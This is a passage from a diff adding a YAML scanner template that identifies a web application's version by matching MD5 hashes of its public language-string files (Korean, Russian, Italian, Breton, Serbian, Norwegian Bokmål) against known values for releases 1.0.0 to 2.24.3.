"(\"697cc74c609c3f4672a5106e937867da\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.1 + dsl: + - "(\"8472c5c814493a76399bc4a7fe9bd323\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"272174f2c3f6b18d4f3386336400b83b\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"2943228fd4624400d48a73f0addc60b1\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"73048bbc4fcb9a2acac4bd4424d3315d\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.8.1 + dsl: + - "(\"a1aeea95e9c5c38f4cfba2642cd5ebca\" == md5(body))" + - type: dsl + name: 2.9.0 - 2.10.1 + 
dsl: + - "(\"e561b9dcf1c4e4be3c19c50563a5f380\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"600b0382a61541982a7246494e9edfc0\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"450edd3090502bbfa287b531937e2c74\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.13.2 + dsl: + - "(\"13aa59c6ffc743b6d8f3b921b643581b\" == md5(body))" + - type: dsl + name: 2.14.0 - 2.15.1 + dsl: + - "(\"2270024f4407fb9cbda25ace7c077d04\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.16.1 + dsl: + - "(\"c9947fe205be78d279f544c75ced3471\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.19.1 + dsl: + - "(\"f90514fc42f31796a89f9219ec00a6f6\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.20.1 + dsl: + - "(\"16679489fcc4f775a37cdee443bda2ed\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.21.3 + dsl: + - "(\"b6d7e5f359debaa809ad83224f93901a\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"6d7a5860aed4e6a431f37b11c02abd0e\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"18cabede24224236bffc7cda4b38d160\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"a2f9d2ae9d829dddc96ce8e21b5c1fa8\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_korean.txt" + + matchers: + - type: dsl + name: 2.6.0 + dsl: + - "(\"4f74c9970e35b2453bb1e5276fe592bb\" == md5(body))" + - type: dsl + name: 2.5.0 - 2.5.2 + dsl: + - "(\"9731afa3f57db6aafaadfca53d4e13b6\" == md5(body))" + - type: dsl + name: 2.4.0 - 2.4.2 + dsl: + - "(\"31b6ef075fe9f352a8123c3434d1cf90\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.3.3 + dsl: + - "(\"9433b47d07b341becbdc6903b76e6af5\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.2.4 + dsl: + - "(\"87af6c0f176d0a099659a7e778a2898a\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"4dacda671bdc1dcd565a735479b25c27\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"316b38414bcde4e69d0d5a6700a9ddc9\" == md5(body))" + - type: dsl + name: 
1.3.4 - 1.3.20 + dsl: + - "(\"55133e56c73074faa2b56c56af951924\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"2dfd60bfe7ffba8454f61ea317a96676\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"e087aa85c3c1eddfe04a59f6d123d92b\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"883c542b94c2853f4a1419db47ede927\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"cc109a3d22b57c16e65452245964f8c0\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"59538f9f1b1e93d0fc37e2b7e4a5b136\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"4b988abb01070607d846ebe519ea9e5c\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"6e27ebf082b46c9f1eee38b33a2ec930\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"f4783a70ff8db6d1cfbf7e8db849fc3c\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"1b6c63c781a6471b8ef1138a06ecd05b\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"c64ce611c52b14bf57ede411fd655881\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"1c9684b751c45446583ebdb0ca1e42ed\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"7d82f3bf0821e03c3453aab3724c61aa\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"5b9817cc17187790992f3ff06cc2dd52\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"2bd84930be5db0611ca293dc69334264\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"0b305c96cd338ddce6681d26c1466abd\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"ea5bfbefdc1c64bc4253cf68008892fd\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"753e9d414cef27401a44e139fb907df7\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"dceceb017e4613e47422a2f8c9418545\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"8f845e090211984e45eb6d4b15366b66\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - 
"(\"3a2403eab5ad3a3f4f16f8cdbaa17554\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"c825106692ac206822316cb558e36ef8\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"896d3940696f8e341efe81f5425f2691\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.10.1 + dsl: + - "(\"75c6644ff1a822ad629ae951b246a6b5\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"f2b6fe5afb47d099f3c7f0e5f8f99d2b\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"c42edc53abe84c046870ddd40cf081e0\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.13.2 + dsl: + - "(\"39d2d237bbf62c9f54dc49d1cd2a48d3\" == md5(body))" + - type: dsl + name: 2.14.0 + dsl: + - "(\"791f21585e5db0e5e0b86c7b82f2a4d3\" == md5(body))" + - type: dsl + name: 2.15.0 - 2.15.1 + dsl: + - "(\"d1e627841472d23f930e3111c7385001\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.16.1 + dsl: + - "(\"7b5022db84cecea96c4e2c9d2261fbda\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.19.1 + dsl: + - "(\"e18c7f708c96abda75312d8dda74a8b0\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.21.3 + dsl: + - "(\"551bee490e4e23ec242660ebde27849c\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"0b5989d93491cdabcd08fe70e50c3322\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"15cfaa5e64d5db509ddc36837e13fb2e\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"7e74f17977d3305cb794541f761fc3a7\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_russian.txt" + + matchers: + - type: dsl + name: 2.6.0 + dsl: + - "(\"f19814b1309b8f8aac8e2a30babc4816\" == md5(body))" + - type: dsl + name: 2.5.0 - 2.5.2 + dsl: + - "(\"b43c628962bdef0b646b8eff3b2fc834\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.4.2 + dsl: + - "(\"d3e891dd07ed9803ebf717a14278f8f4\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.2.4 + dsl: + - "(\"58dd1eeb959760c7b0da507eeca95686\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - 
"(\"ec56fc8195eb64774edd7db5e8663202\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"984a098fa6ee613442d31e53b16083d5\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"b227700d188df391f8e45d137382dd32\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"b793971dbc4c0ac66cffd34585e0b135\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"ee924b0becebf71961e47bc949896b13\" == md5(body))" + - type: dsl + name: 1.2.7 - 1.2.8 + dsl: + - "(\"92388c4c9dc275af39ede7a9d9126b88\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.6 + dsl: + - "(\"b01bf7bfe5bab041ccea2c386ce06aef\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"869a3e271f18f69527c20219a32ccdb2\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"3e9b9f5ed6cb3cc0cfeed92093e4d252\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"f392e0b0e2cecd58f09654dcff2bac00\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"0cf04ed2043a2d49506e37f7b335c142\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"afbb223aab69fef6be8537d0be64a095\" == md5(body))" + - type: dsl + name: 1.2.14 + dsl: + - "(\"98df160f4f5c74dd1364c371a1234fc2\" == md5(body))" + - type: dsl + name: 1.2.13 + dsl: + - "(\"0baff575ee89e308f4acfc019f2dda16\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"222e2271bd6159f4047331d10b91e5d5\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"58fc9728e3dd1676fb39f408f0f0ea5c\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"3718074613f6314f13c6046f4488a396\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"ae4ee0f05338bee6eb5ad14c447a2bc3\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"0580c84a5f494f007aa8bb730b7bd9c1\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"8697fc5ce2ae8c78b9b311cea9eef71d\" == md5(body))" + - type: dsl + name: 1.1.1 - 1.1.4 + dsl: + - "(\"186dcf12e0d86ae4e6d13b7fec11aeeb\" == 
md5(body))" + - type: dsl + name: 1.1.0 + dsl: + - "(\"273db99b8e11e6aaeb458042ba44bebc\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"aa086797746b8c6fd3d2446f7762e3fd\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"f3d7abea8e4c90af361304d1b8f28918\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"31af10d201b8373ce305e218103ff7d0\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.10.1 + dsl: + - "(\"74cac54b13f9bcf27cc8cc23e5415e15\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"51c16a2ec7ec20e5e469e9deb2a177b3\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"1dc2f3ba5938eba06c7cb97686c4fc4c\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.13.2 + dsl: + - "(\"d04bdab2660f0bb9200874cb05a8fee6\" == md5(body))" + - type: dsl + name: 2.14.0 - 2.15.1 + dsl: + - "(\"86649e1d785e2a28c8d6988d54705a5a\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.16.1 + dsl: + - "(\"35e20c1c7f9c19e064e55f61a9e7aabf\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.17.2 + dsl: + - "(\"b0fa97d1040374247126a0fda5391525\" == md5(body))" + - type: dsl + name: 2.18.0 - 2.19.1 + dsl: + - "(\"fd94ab4e651eb338aa1f523e4a0e3978\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.20.1 + dsl: + - "(\"d5afb3b1d291cd9f67f3235072e04159\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.21.3 + dsl: + - "(\"5caf2db3bd150d9c16ace0b6ba51a2af\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"ff7748af4a9c61faa5b7ff8f1555d5d8\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"2be57b4f9d7e74adb8f3fb7edc673609\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"53ce92fa7a9b2c0c1bc39421b4651bcc\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_italian.txt" + + matchers: + - type: dsl + name: 2.6.0 + dsl: + - "(\"f4cea108c7847b111deb8bc197d45b98\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.5.2 + dsl: + - "(\"e26b54a8fc98e95794776af332c570d3\" 
== md5(body))" + - type: dsl + name: 2.2.0 - 2.2.4 + dsl: + - "(\"f53cdd96b8266724b77d51859548564e\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"a371adc09c36fd05298fa2267598a15f\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"f6de9f45d98a71b5484551ada1696687\" == md5(body))" + - type: dsl + name: 1.3.4 - 1.3.20 + dsl: + - "(\"12b24a95cfc06a769b74a8959f64de06\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"6558fa34bc5d7fca25f7b3563ee3aaf7\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"5e6fcc59ee3576d675bbdb17f5a6c6cf\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"7f3c2c78f33320cb6e5ac96e73ae76fe\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"27bf8bbb3d8a321086941132f15f5904\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"71a69b3be3c4ce5d866b56887f781df6\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"2b8383ca16ce80582423ebd7216276b0\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"6d95f50981543f60a28259e08e6d1eed\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"ffa96c2e9a7896d934d6dbfa4e0dbb5f\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"653c11b5d30ca06e7c06aa20eb5c5948\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"b651f0b4308f0e2a0cf6cf4704b63084\" == md5(body))" + - type: dsl + name: 1.2.14 + dsl: + - "(\"8528eda1bbc920dfe4f21c91622488dd\" == md5(body))" + - type: dsl + name: 1.2.13 + dsl: + - "(\"77df7f0189039b9ea8548567164fca45\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"6ef5af275e7d0ee2e9adc90ec0d85ee0\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"4f98aed2fce088c27b39803c4ac824cd\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"ccb478a0c5cc1b89b33d17757cbb1df8\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"33ca6da72dea2715115d24f814a53418\" == md5(body))" + - type: dsl + name: 1.1.7 - 
1.1.9 + dsl: + - "(\"b1ba3f0a390d3b34a74d049655ddad6f\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"1cfe9863e6c8b9b676cae73765b35297\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"090a5a44d82490a78d9335195c43bafd\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"d5c235b00b25e856001d41bb2cf04481\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"3f42a71ce3117b1d736c29ed54cf865c\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"26d083e96b75f5f3d16449de79461b75\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.10.1 + dsl: + - "(\"c76df5aa811b49eac36a1ef519956a1b\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"c8432890926d730ac5cf7f5d17ceb0a1\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"a2f841e3fd1443b4ffb996758fa2c751\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.15.1 + dsl: + - "(\"cae20234d5530c193240ed614a649ad9\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.16.1 + dsl: + - "(\"232813b7fffb60d5358fb81ac209ed65\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.18.1 + dsl: + - "(\"207a116aa484b3a6bd971bb852effb76\" == md5(body))" + - type: dsl + name: 2.19.0 - 2.19.1 + dsl: + - "(\"ce31bb000ba95422bfb7c75d174cb44c\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.20.1 + dsl: + - "(\"9efeea9e09d8f019b7ec1c56acc3b222\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.21.3 + dsl: + - "(\"7c3d5447e85cd95d3fcdd16c61b4aa53\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"71e8b612d1b1d1e8170b8914efc73be2\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"a6d1dc636e66ef16cba751353da3bc3c\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"c844a7cb67ee96e256131d26a549830c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_breton.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.8.1 + dsl: + - "(\"dfb7e5b378bf7887df296acb492d1922\" == md5(body))" + - type: dsl 
+ name: 2.4.0 - 2.5.2 + dsl: + - "(\"e0110288015a21dc4e71b64a6c7a97bd\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.3.3 + dsl: + - "(\"3ccb1d1297e035caa2f64f4fd08c468c\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.2.4 + dsl: + - "(\"737725b168215729b5d07a78dab67d9c\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"dd2516d9a0d7cc646081da192ca276ac\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"e9da8547f66b8a79ede080d0edbc68bd\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"27b0b3631592fa7b135f16a2d9bd1366\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"1b93943791e8b63c95cc7c6fc0c8ec4a\" == md5(body))" + - type: dsl + name: 1.2.7 - 1.2.8 + dsl: + - "(\"b260c2b511af576d70df257420a63e2b\" == md5(body))" + - type: dsl + name: 1.2.6 + dsl: + - "(\"e89b4fc3ed5329f41b29f260fe865559\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"56f12c2bca1e8d591563ff0c8d10876b\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"fdfb0a41d3145b56dcc0fe6f1f0f650e\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"6dd8cd14929d76440189c843da67ac4f\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"4d172d9bfe9b4319152b8fe35fc949e4\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"01840fce6e61757c29791ebc086ffc8a\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"2d803f4025855c9e53963f04fbb0a9c3\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"d401d5d95475dc724e1540f4a86a7b15\" == md5(body))" + - type: dsl + name: 1.2.14 + dsl: + - "(\"9e3a437b7137108f1bcd45fb7d8334cb\" == md5(body))" + - type: dsl + name: 1.2.13 + dsl: + - "(\"14a90d018788c5b020c41b35d5db402a\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"e461872208993b16753b898635108bbf\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"6340e4ab79e2b36df8d0c3ff15f035ab\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - 
"(\"c86f83fdd8c046c2e5205adf98331930\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"f2b47ef9ac71450aa4a846b243f8c6a5\" == md5(body))" + - type: dsl + name: 2.9.0 - 2.10.1 + dsl: + - "(\"ff2d4cdfbc2d25e3949240b518eb8dc7\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"dd0f871e4cc8bcaf336f5b2b6e63cd7a\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"28bca7a7044c740379326d75b999fa17\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.15.1 + dsl: + - "(\"8241ade7062dd142ed3c7bc9c74d161f\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.17.2 + dsl: + - "(\"0ccd2ae5285ef3943a23cf0f189b9baf\" == md5(body))" + - type: dsl + name: 2.18.0 - 2.18.1 + dsl: + - "(\"b9885b46e5eda70d9c277acb71b33184\" == md5(body))" + - type: dsl + name: 2.19.0 - 2.19.1 + dsl: + - "(\"f334b4e4abf5feaaa3ebf58768536da5\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"9d07353272c31672d519030290f64bd5\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"b98e5831979357dc1f8ab15cda83212f\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"acb2d1907f65a22f6b62fd7ded8d6cc9\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_serbian.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.10.1 + dsl: + - "(\"0392eef1e913aff50a2b03cce2523a06\" == md5(body))" + - type: dsl + name: 2.4.0 - 2.5.2 + dsl: + - "(\"a15fe0d65da70583d43d5f087067b3c2\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.3.3 + dsl: + - "(\"6bacf8fee885b10b33784264e7dbb1c0\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"03674b1662989f156bfe2aee223c8bc1\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"a3d1c3bbe26ea326589c83fadce50858\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"77cf25f06a18378a56e865e2ae5c085f\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"ca0011b6df2a84f56de32cc36a17d196\" == md5(body))" + - type: dsl + name: 1.2.6 - 
1.2.8 + dsl: + - "(\"14cb9143c34f3161d8fab58b87dbf27f\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"35f5c83a5ead800ce23a08178f3ddae5\" == md5(body))" + - type: dsl + name: 1.2.3 - 1.2.4 + dsl: + - "(\"0eea0796d69c5bff704940739bbe49fb\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"397e9ec5fb132477b7d8e998437c4d17\" == md5(body))" + - type: dsl + name: 1.2.2 + dsl: + - "(\"5e131ea50a670fdcc3fcf1827e4a8109\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"f5f0b92ac71ad0430dc3765bd9f45bd2\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"ce7c932bce84abe6dfa47b885b0e6813\" == md5(body))" + - type: dsl + name: 1.2.14 + dsl: + - "(\"79c9b5cc4ba1236b1c61ba1f440f49f3\" == md5(body))" + - type: dsl + name: 1.2.13 + dsl: + - "(\"a6c42c1321cf5c253d42dbe4d5bc26a4\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"2f8579a61f6f570f7fae96b672fa8907\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"3858102270b2e03e6fe6a332147e9a4d\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"9f1b8a5728a927aa96cd1f367308bc13\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"f45b7381addf84b9a820f4b4581878fc\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"d00becc79264cf8ed80b8a09afece345\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"9f78cf645869c868d67ab0ce63e85468\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"4158ba92563bb79adc0199a94b007c89\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"1afe4b97b1b7e7b507e5ac92cf3e4e0b\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"968846b5d2a6586d136be6ea5f9449b2\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"5d903f18f5e55c6b8a52655d9ffd9fae\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"017930670b1c23c0c711bc759d4c9f65\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"ae5a6982cd8f6009eb973caa54846f95\" 
== md5(body))" + - type: dsl + name: 2.13.0 - 2.14.0 + dsl: + - "(\"bbfb55d227909e00f7c3b6871e643213\" == md5(body))" + - type: dsl + name: 2.15.0 - 2.15.1 + dsl: + - "(\"7f06fa18cf62d4f8071156424a00d746\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.16.1 + dsl: + - "(\"be09f80595eee7ff2e6c03b14d46f38b\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.17.2 + dsl: + - "(\"14b084ff4d58732b2c79a6b640bfcc6f\" == md5(body))" + - type: dsl + name: 2.18.0 - 2.19.1 + dsl: + - "(\"d26bf6ab0c88298dcc2513b5a45621b7\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.23.1 + dsl: + - "(\"9667d54457f13252a50fa4796b0c6f5c\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"c1bc9a3b885db43c3c30b8d1fd1bb88f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_norwegian_bokmal.txt" + + matchers: + - type: dsl + name: 2.2.0 - 2.6.0 + dsl: + - "(\"2f88336ae9fc3866c5afa94a1ebff564\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"eaddece15103388db18ee9f7f4e75346\" == md5(body))" + - type: dsl + name: 1.3.5 - 2.0.1 + dsl: + - "(\"ebce2d45bf5800e9cbb6b8abaa00a3fe\" == md5(body))" + - type: dsl + name: 1.3.4 + dsl: + - "(\"35e677310328ba7582435f75c679d077\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"565386366c680f5e0eb1f448f12d97ac\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"5ac49566d78a0162885b795a93016e95\" == md5(body))" + - type: dsl + name: 1.2.7 - 1.2.8 + dsl: + - "(\"b7c2980bca7ffa10da40ba8ecbc1524e\" == md5(body))" + - type: dsl + name: 1.2.6 + dsl: + - "(\"d714fb6db8483375dd781ea716419eec\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"838e0ee32a837cce60e9294b871d4a10\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"6fd8ecd789c41b0f85a93daf05d585ae\" == md5(body))" + - type: dsl + name: 1.2.3 + dsl: + - "(\"79ee7b0f1ec06b37062e20f22d69c5ae\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"97660b6002457bb8b7176b57b9da24f4\" == 
md5(body))" + - type: dsl + name: 1.2.2 + dsl: + - "(\"bb281424767fe8389989a689c7cf5531\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"adea9fd15fea109444cf963e3aebf17b\" == md5(body))" + - type: dsl + name: 1.2.15 - 1.2.16 + dsl: + - "(\"8976e83ac1dce371b32e02a69db45f7b\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"4464e10998b1281fb2c0141fceb7092f\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"4be8a5a1b3def29826b4856c49b0e804\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"97baa3f022c9acf719a0aa787b932d3c\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"e38a972813b3371c54b3615e05f1b4bc\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"0e2d82a673931517ad1997ff15327b8c\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.11.1 + dsl: + - "(\"e3c498d16cf5e390ecb9105a46eed029\" == md5(body))" 